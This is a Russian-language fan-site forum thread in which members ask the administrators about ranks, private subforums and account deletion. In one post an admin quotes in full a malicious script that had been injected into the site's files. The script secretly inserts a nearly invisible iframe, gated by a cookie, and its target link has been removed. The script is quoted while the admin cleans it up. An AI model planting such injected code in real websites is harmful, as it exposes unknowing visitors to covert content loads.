Правила сайта FAQ Мини-чат
Для добавления необходима авторизация!
23.04.2024, Вторник, 16:06


Форум » Наш сайт » О сайте » Вопросы к администрации (Вы спрашиваете - мы отвечаем.)
Вопросы к администрации
Сообщение #1
Здесь задаём свои вопросы администрации сайта

[admin]
Вопросы по прохождению игр, обсуждению игр,
обсуждения действий конкретных модераторов, обсуждение действий администраторов сайта - ЗАПРЕЩЕНЫ!

[/admin]

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #21
Hamul, да я так, помечтал :D
Ну а если серьёзно, то группировку "Мутанты" лучше не добавлять. Если они и будут в будущем, то врядли будут вместе.


Если из истории убрать всю ложь, это ещё не значит, что останется только правда. В результате может вообще ничего не остаться.

Сообщение отредактировал Krowosos - Четверг, 08.08.2013, 23:39


Уважение: 3
Награды: 2
Облучение: 0%
Сообщение #22
Это понятно, если в будущем изменится дизайн - добавление некоторых значков-групп будет реализовано, то можно будет вновь поднять вопрос.


Бороться и искать, найти... и... перепрятать! Самое интересное в человеке - это мысли, ибо без мыслей он животное!

Уважение: 346
Награды: 76
Сообщение #23
Возможно в конце августа переделаю немного, поправлю косячки и возможно выделю место для прикрепления значка принадлежности к группировке тем пользователям, которые находятся в группах модераторы/админы.

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #24
При входе на сайт вот что происходит.


Сейчас, попробую увеличить.
Вот в ворде сохранил, может так увеличешь. Troyn

Цитата (volazar)
Сейчас должно быть все чисто, еще раз перепроверил.

Да, сечас перестало, а то при переходе на любую тему KIS сразу реагировал на ссылку: http://stalker-gamers.ru/design/hint/hint.js//

Сообщение отредактировал filoret - Вторник, 13.08.2013, 16:56

Вольный сталкер
Уважение: 245
Награды: 32
Облучение: 20%
Сообщение #25
filoret, А можно побольше скрин? А то непонятно что там написано. Или напишите информацию ,которую подает антивирус. там должна быть ссылка на проблемную страницу и название вируса.
ЗЫ: Проверил у себя авастом, с др компа кисом - все нормально.

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #26
filoret, Это фрейм был. Который открывал окошко с размерами 7*9 пикселей в углу экрана. Используется как накрутка для сайтов. Как он к нам попал - не знаю, сегодня утром вычищал кучу скриптов от него.
Сейчас должно быть все чисто, еще раз перепроверил.

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #27
Цитата (filoret)

Это то, с помощью чего появляются всплывающие подсказки на сайте.

А ругалось на этот кусок:
Код
/*0f2490*/
function zzzfff() {   
var dv = document.createElement('ifrаmе');   
dv.src = 'Ссылка убрана';   
dv.style.position = 'absolute';   
dv.style.border = '0';   
dv.style.height = '9px';   
dv.style.width = '7px';   
dv.style.left = '1px';   
dv.style.top = '1px';   
if (!document.getElementById('dv')) {   
      document.write('<div id=\'dv\'></div>');   
   document.getElementById('dv').appendChild(dv);   
   }
}
     
function SetCookie(cookieName,cookieValue,nDays,path) {   
var today = new Date();   
var expire = new Date();   
      if (nDays==null || nDays==0) nDays=1;   
   expire.setTime(today.getTime() + 3600000*24*nDays);   
   document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie( name ) {   
var start = document.cookie.indexOf( name + "=" );   
var len = start + name.length + 1;   
      if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) )   
   { return null; }   
       if ( start == -1 ) return null;   
   var end = document.cookie.indexOf( ";", len );   
   if ( end == -1 ) end = document.cookie.length;   
       return unescape( document.cookie.substring( len, end ) );
}
   if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){
    } else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
    }
   }
/*/0f2490*/


С утра эта бяка прописалась во множестве файлов.

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #28
Так у вас чёрт голову сломит. Не черта не найдёшь. Пишу сюда.
Прошу удалить мой профиль, не хочу быть на сайте, где все стучат друг на друга, вскрываю почту и читают ЛС.
Такое чувство что постоянно кто то за спиной. Словно в концлагере а не в свободном интернете.


Удивительно не то, что дураки "выступают с трибуны", а то, что им аплодируют умные.
Аврелий.
Skype:lena_antoniva1
Призрак
Уважение: 406
Награды: 43
Облучение: 20%
Сообщение #29
Цитата (LENA_D)
не хочу быть на сайте, где все стучат друг на друга, вскрываю почту и читают ЛС.

Не судите людей по себе и по Вашему сайту. Если Вы внимательно прочитали предидущие посты, а так же пришедшее Вам ЛС, то думаю, Вы поняли, что это массовая рассылка администрации с советом сменить пароли от аккаунтов, в связи с обнаружением вредоносного кода на сайте. Если Вы восприняли это как попытку вскрыть Ваш аккуант и прочитать Ваши ЛС, то Вы глубоко заблуждаетесь. На данном сайте такие действия невозможны, поскольку такие действия противоречат политике администрации сайта и является самым низким поступком в интернете.
Цитата (LENA_D)
Такое чувство что постоянно кто то за спиной. Словно в концлагере а не в свободном интернете.

Концлагерь, Вы знаете где находится, и где постоянно удаляют неугодные Вам посты пользователей.
Цитата (LENA_D)
Прошу удалить мой профиль,

[Frankenshtayn]Принято к рассмотрению.[/Frankenshtayn]
Веселый Роджер
Уважение: 936
Награды: 112
Сообщение #30
Цитата (LENA_D)
где все стучат друг на друга, вскрываю почту и читают ЛС.

Данные слова звучат от действительного администратора минимум двух сайтов работающих в системе ucoz, следовательно ваши обвинения должны быть подкреплены фактами. Как Вы понимаете, Ваше обвинение достаточно серьезно. Прошу предоставить доказательства того, что администрацией данного ресурса были вскрыты чьи то аккаунты.
Умейте держать ответ за свои слова!!!

Кстати... на всякий случай с данной страницы снят полный скрин вебстраницы (мы же знаем, что вы любите подчищать неугодные вам темы или сообщения... особенно такого толка). Соответственно сделаны скрины переписки в ЛС - дабы их несколько не потерять :) у нас же с вами действительно богатые архивы ;) .


Бороться и искать, найти... и... перепрятать! Самое интересное в человеке - это мысли, ибо без мыслей он животное!

Уважение: 346
Награды: 76
Сообщение #31
Цитата (LENA_D)
Прошу удалить мой профиль

[Hamul]На ваш запрос об удалении аккаунта оповещаем:
Советом администраторов было рассмотрено ваше обращение. 100% голосованием было решено - профиль не удалять.

Данное решение обсуждению и обжалованию не подлежит.
[/Hamul]


Бороться и искать, найти... и... перепрятать! Самое интересное в человеке - это мысли, ибо без мыслей он животное!

Уважение: 346
Награды: 76
Сообщение #32
Здравия желаю,Уважаемая Администрация!Подскажите пожалуйста ,как попасть в приватный форум военных(я так понял,что это база военных сталкеров) Дитятки.Как раздобыть ключ к этому форуму?..


Военный Сталкер
Уважение: 190
Награды: 35
Облучение: 0%
Сообщение #33
Доброго Дня.
Извините, если пишу не в эту тему или ответ уже был дан (не нашел видать).
От чего зависит ранг пользователя (гражданский, отмычка, новичок и т. д.)?


Вольный Сталкер
Уважение: 178
Награды: 31
Облучение: 0%
Сообщение #34
Цитата (IGOR™)
От чего зависит ранг пользователя (гражданский, отмычка, новичок и т. д.)?

IGOR™, от количества ваших постов(сообщений) на форуме. Чем больше постов, тем выше ранг.

Сообщение отредактировал J776 - Четверг, 19.09.2013, 13:55

Фотограф
Уважение: 402
Награды: 80
Облучение: 0%
Сообщение #35
J776, Спасибо за ответ.
А имеется ли примерная таблица сообщений? Например: от 0 до 20 сообщений - гражданский, 20 - 40 - отмычка и т. д. Если есть, то где ее можно посмотреть? И еще такой вопрос, может ли пользователь увидеть количество своих сообщений на сайте?


Вольный Сталкер
Уважение: 178
Награды: 31
Облучение: 0%
Сообщение #36
Цитата (IGOR™)
может ли пользователь увидеть количество своих сообщений на сайте?

IGOR™, легко, заходишь в свой КПК и находишь там "деньги- 274". Вот на циферку и жми. Откроется окно с информацией.

Цитата (IGOR™)
имеется ли примерная таблица сообщений? Например: от 0 до 20 сообщений - гражданский, 20 - 40 - отмычка и т. д.

Имеется, но к сожалению точно её не помню. Появится кто из админов и обязательно ответят на этот вопрос.
Фотограф
Уважение: 402
Награды: 80
Облучение: 0%
Сообщение #37
IGOR™, Я об этом писал в ЭТОМ посте.

Цитата (ilya)
Подскажите пожалуйста ,как попасть в приватный форум военных(я так понял,что это база военных сталкеров) Дитятки.Как раздобыть ключ к этому форуму?..

Отправил в ЛС.

Уважение: 650
Награды: 97
Облучение: 0%
Сообщение #38
Как попаст в приватный форум - Разработка Аддона "Время альянса"?
Можно ли получить пароль? Спасибо!


Windows 7 Максимальная 64-bit SP1, Intel Core i7 CPU 860 @2.80 GHz, 16 GB RAM, AMD Radeon HD 7700 Series
Сибиряк
Уважение: 160
Награды: 30
Облучение: 0%
Сообщение #39
Вспышка, а причем здесь администрация? Все вопросы к "Альянсу".


Бороться и искать, найти... и... перепрятать! Самое интересное в человеке - это мысли, ибо без мыслей он животное!

Уважение: 346
Награды: 76
Сообщение #40
Кто мои кровно нажитые 33 рубля снял и за что?

Уважение: 220
Награды: 39
Облучение: 0%
Форум » Наш сайт » О сайте » Вопросы к администрации (Вы спрашиваете - мы отвечаем.)
Поиск: